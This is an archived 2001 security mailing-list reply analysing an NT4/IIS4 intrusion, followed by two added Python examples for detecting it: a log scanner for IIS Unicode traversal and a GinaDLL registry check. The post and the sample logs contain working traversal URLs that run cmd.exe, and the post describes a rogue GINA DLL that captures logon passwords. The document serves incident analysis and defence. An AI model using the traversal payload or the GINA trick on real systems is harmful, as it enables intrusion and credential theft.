Security Incidents mailing list archives

Re: Some details in a recent NT hack we encountered


From: Matt Scarborough <vexversa () USA NET>
Date: Sun, 25 Feb 2001 15:18:08 EST

On Wed, 28 Feb 2001 21:48:23 +0000, Gossi The Dog <gossi () OWNED LAB6 COM>
wrote:

> First off, the IIS unicode exploit does not give you SYSTEM or
> Administrator privs.  So how are they getting those (they'll need them to
> make those dirs and set permissions etc).

Using David LeBlanc's DumpTokenInfo, which "dumps the information from a process
token," view the output below. Any misinterpretation of Mr. LeBlanc's code is
my fault, not his.

Understanding Process Tokens
http://www.windowsitsecurity.com/Articles/Index.cfm?ArticleID=15989

When I say default below, I mean you grab the floppies and install NT4 and
grab the Option Pack and install IIS4. Sadly, this happens too often. And then
this default box gets plugged into the Internet.

Default IIS4 is on default NT4 at 192.168.1.65. 

C:\INETPUB\SCRIPTS\TEST.CMD is
CMD /C "DumpTokenInfo.exe >dump.txt"

we do from some other box
http://192.168.1.65/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+test

and then view the contents of C:\INETPUB\SCRIPTS\DUMP.TXT

Token Owner: ANTARCTICA\IUSR_ANTARCTICA - User
Token Primary Group: ANTARCTICA\None - Group
Token Default DACL:
Access Allowed for:
ANTARCTICA\IUSR_ANTARCTICA - User
All access
Access Allowed for:
NT AUTHORITY\SYSTEM - Well-known group
All access
Token Source: IIS
Token type: Primary Token
Token is not an impersonation token

> Secondly, what program is generating those WinLogon logs?  Not seen that
> before at all, very interesting.

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
"GinaDLL"
Type: REG_SZ
Data: newgina.dll

NewGina.DLL replaces MSGina.DLL with a hacked (to say the least) version.

As such, activities like the SAS (CTRL+ALT+DEL) are passed by WinLogon as
WlxLoggedOnSAS to the rogue NewGina.DLL. Usernames and passwords for local
logons could be saved to a file or E-mailed to an attacker across the globe.

> erm, eek.

Exactly.

Matt 2001-02-25
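The traversal request shown above (`..%c1%1c..` smuggling a backslash past the path check) leaves a recognisable fingerprint in the IIS logs. The following is an added example, not code from the original post or from Mr. Scarborough: it mimics the lenient two-byte decoder that turned `%c0%af` into "/" and `%c1%1c` into "\" and flags any request in which a multi-byte sequence collapses to a plain ASCII character and the result contains "..". The sample W3C log lines are constructed for illustration and assume cs-uri-stem was logged as received, before decoding; the host and client addresses are made up.

```python
"""
Added example (not code from the original post): detect the IIS Unicode
directory-traversal requests discussed above in W3C-format IIS logs.

IIS 4/5 decoded %xx%yy pairs as two-byte UTF-8 without checking that the
lead byte may start a 2-byte sequence or that the second byte is a valid
continuation byte, so %c0%af became a slash and %c1%1c a backslash.  We
mimic that lenient decoder and flag any request where a multi-byte
sequence collapses to a plain ASCII character (an "overlong" encoding)
and the result contains "..".  Sample log lines are constructed for
illustration; they assume cs-uri-stem is logged as received.
"""
import re

PCT = re.compile(r"%([0-9A-Fa-f]{2})")


def lenient_decode(path):
    """Return (decoded_path, overlong) where overlong lists each %xx%yy
    pair that decoded to an ASCII character (< 0x80)."""
    out, overlong = [], []
    i, n = 0, len(path)
    while i < n:
        m = PCT.match(path, i)
        if not m:                       # literal character
            out.append(path[i])
            i += 1
            continue
        b1 = int(m.group(1), 16)
        i = m.end()
        if 0xC0 <= b1 <= 0xDF:          # lead byte of a 2-byte sequence
            m2 = PCT.match(path, i)
            if m2:
                b2 = int(m2.group(1), 16)
                # The flaw: no check that b2 is 10xxxxxx; %c1%1c -> 0x5C
                code = ((b1 & 0x1F) << 6) | (b2 & 0x3F)
                if code < 0x80:
                    overlong.append((path[m.start():m2.end()], chr(code)))
                out.append(chr(code))
                i = m2.end()
                continue
        out.append(chr(b1))             # ordinary single-byte %xx
    return "".join(out), overlong


def analyze_request(stem):
    """Classify one cs-uri-stem value."""
    decoded, overlong = lenient_decode(stem)
    canon = decoded.replace("\\", "/").lower()
    return {
        "decoded": decoded,
        "overlong": overlong,
        "traversal": "/../" in canon,
        "cmd": "cmd.exe" in canon,
    }


def scan_log(lines):
    """Return hits from W3C extended log lines (the '#Fields:' header
    names the columns). A hit is a request that needed an overlong
    sequence to form '..' plus a separator."""
    fields, hits = None, []
    for line in lines:
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line.strip() or line.startswith("#") or fields is None:
            continue
        rec = dict(zip(fields, line.split()))
        r = analyze_request(rec.get("cs-uri-stem", ""))
        if r["overlong"] and r["traversal"]:
            hits.append({
                "client": rec.get("c-ip"),
                "time": rec.get("time"),
                "stem": rec.get("cs-uri-stem"),
                "query": rec.get("cs-uri-query"),
                "decoded": r["decoded"],
                "cmd": r["cmd"],
            })
    return hits


# Constructed sample log; the first and fourth requests are the attack,
# the %2e in the last line is ordinary single-byte encoding (not flagged).
SAMPLE_LOG = r"""#Software: Microsoft Internet Information Server 4.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-02-25 15:18:08 10.0.0.7 GET /scripts/..%c1%1c../winnt/system32/cmd.exe /c+test 200
2001-02-25 15:18:10 10.0.0.7 GET /scripts/dump.txt - 200
2001-02-25 15:18:20 10.0.0.9 GET /default.asp - 200
2001-02-25 15:18:30 10.0.0.7 GET /scripts/..%c0%af../winnt/system32/cmd.exe /c+dir+c:\inetpub 200
2001-02-25 15:18:40 10.0.0.12 GET /images/logo%2egif - 200
"""

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG.splitlines()):
        print(f"{h['time']} {h['client']} {h['stem']} -> {h['decoded']}"
              f" query={h['query']} cmd={h['cmd']}")
```

The point of decoding rather than grepping for `%c1%1c` is that the same flaw accepts several byte pairs (`%c0%af`, `%c1%9c`, `%c1%1c`, ...) for the same separator; checking what the pair decodes to catches all of them with one rule.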

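The GinaDLL replacement described in the post is easy to check for, either from a registry export or on the live box. What follows is an added example, not code from the original post or from Mr. Scarborough: it parses the Winlogon key out of a REGEDIT4-style export and reports whether GinaDLL is absent (the default, Winlogon then loads msgina.dll), names the default DLL, or names something else such as the newgina.dll from the post. The two export snippets are constructed; the `check_live` helper is an assumed convenience that uses the standard `winreg` module and only works on Windows. On Windows Vista and later the GINA mechanism was replaced by credential providers, so this value only matters on NT 4, 2000, XP and 2003.

```python
"""
Added example (not code from the original post): check the Winlogon
GinaDLL value the way an incident responder would when reviewing an NT 4
box, either from a registry export (regedit /e) or, on Windows, from the
live registry.  The export snippets below are constructed; the names
ANTARCTICA and newgina.dll come from the post.
"""
import re

WINLOGON = r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon"
DEFAULT_GINA = "msgina.dll"

SECTION = re.compile(r"^\[(.+)\]$")
VALUE = re.compile(r'^"([^"]+)"=(.*)$')


def parse_reg(text):
    """Minimal parser for REGEDIT4 / 'Windows Registry Editor' exports:
    returns {key_path: {value_name: data}}.  Only "name"="string" values
    are unescaped; other value types keep their raw right-hand side."""
    keys, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = SECTION.match(line)
        if m:
            current = m.group(1)
            keys.setdefault(current, {})
            continue
        m = VALUE.match(line)
        if m and current is not None:
            name, data = m.group(1), m.group(2)
            if len(data) >= 2 and data[0] == '"' and data[-1] == '"':
                data = data[1:-1].replace("\\\\", "\\")
            keys[current][name] = data
    return keys


def assess_gina(value):
    """Decide whether a GinaDLL value (None when absent) is suspicious."""
    if value is None:
        return {"gina": None, "suspicious": False,
                "reason": "GinaDLL not set; Winlogon loads the default msgina.dll"}
    base = value.replace("/", "\\").rsplit("\\", 1)[-1].lower()
    if base != DEFAULT_GINA:
        return {"gina": value, "suspicious": True,
                "reason": f"GinaDLL replaced with {value}; every SAS logon passes through it"}
    if "\\" in value:
        return {"gina": value, "suspicious": True,
                "reason": f"GinaDLL names an explicit path ({value}); verify it is the real System32 copy"}
    return {"gina": value, "suspicious": False,
            "reason": "GinaDLL is the default msgina.dll"}


def check_export(reg_text):
    """Assess the GinaDLL value found in a registry export (key and value
    names are compared case-insensitively, as the registry does)."""
    keys = parse_reg(reg_text)
    winlogon = next((v for k, v in keys.items() if k.lower() == WINLOGON.lower()), {})
    values = {name.lower(): data for name, data in winlogon.items()}
    return assess_gina(values.get("ginadll"))


def check_live():
    """Windows only (assumed helper): read GinaDLL from the live registry.
    Reading this key needs no special privilege."""
    import winreg
    path = WINLOGON.split("\\", 1)[1]
    with winreg.OpenKey(winreg.HKEY_LOCAL_MACHINE, path) as key:
        try:
            return assess_gina(winreg.QueryValueEx(key, "GinaDLL")[0])
        except FileNotFoundError:        # value absent: the default state
            return assess_gina(None)


# Constructed exports: a default install and the hacked box from the post.
CLEAN_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultDomainName"="ANTARCTICA"
"Shell"="Explorer.exe"
"""

HACKED_EXPORT = r"""REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
"DefaultDomainName"="ANTARCTICA"
"GinaDLL"="newgina.dll"
"Shell"="Explorer.exe"
"""

if __name__ == "__main__":
    for label, export in (("default", CLEAN_EXPORT), ("hacked", HACKED_EXPORT)):
        print(label, check_export(export))
```

A value that is present but equal to msgina.dll still deserves a look at the file itself (hash it against a known-good copy from the install media), since an attacker can also overwrite the real DLL in place without touching the registry.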
